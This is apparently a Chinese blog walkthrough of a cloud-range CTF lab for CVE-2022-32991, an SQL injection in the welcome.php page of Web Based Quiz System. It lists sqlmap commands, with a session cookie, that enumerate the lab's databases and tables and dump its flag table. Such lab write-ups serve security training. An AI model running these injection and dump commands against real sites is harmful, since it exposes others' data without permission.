【春秋云境】· CVE-2022-32991

本文最后更新于:3 个月前

CVE-2022-32991

tag:**Web Based Quiz System SQL注入**

1
2
靶标介绍:
CMS的welcome.php中存在SQL注入攻击。
  • 开启靶场,注册登录

image-20221223123047164

image-20221223123336704

  • sqlmap一把梭表演开始

    • 初始尝试:
    1
    python sqlmap.py -u "http://eci-2zead7qh0b1g8vq0msr5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid"

    image-20221223123736589

    • 无cookie302跳转,添加cookie并开始暴库
    1
    python sqlmap.py -u "http://eci-2zead7qh0b1g8vq0msr5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --cookie="PHPSESSID=5huqj975niqsdubdv70bavcs18" --batch --dbs

    image-20221223124022740

    • 爆表
    1
    python sqlmap.py -u "http://eci-2zead7qh0b1g8vq0msr5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --cookie="PHPSESSID=5huqj975niqsdubdv70bavcs18" --batch -D "ctf" --tables

    image-20221223124133783

    • 暴字段
    1
    python sqlmap.py -u "http://eci-2zead7qh0b1g8vq0msr5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --cookie="PHPSESSID=5huqj975niqsdubdv70bavcs18" --batch -D "ctf" -T "flag" --dump

    image-20221223124248258

    • Get flag.

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!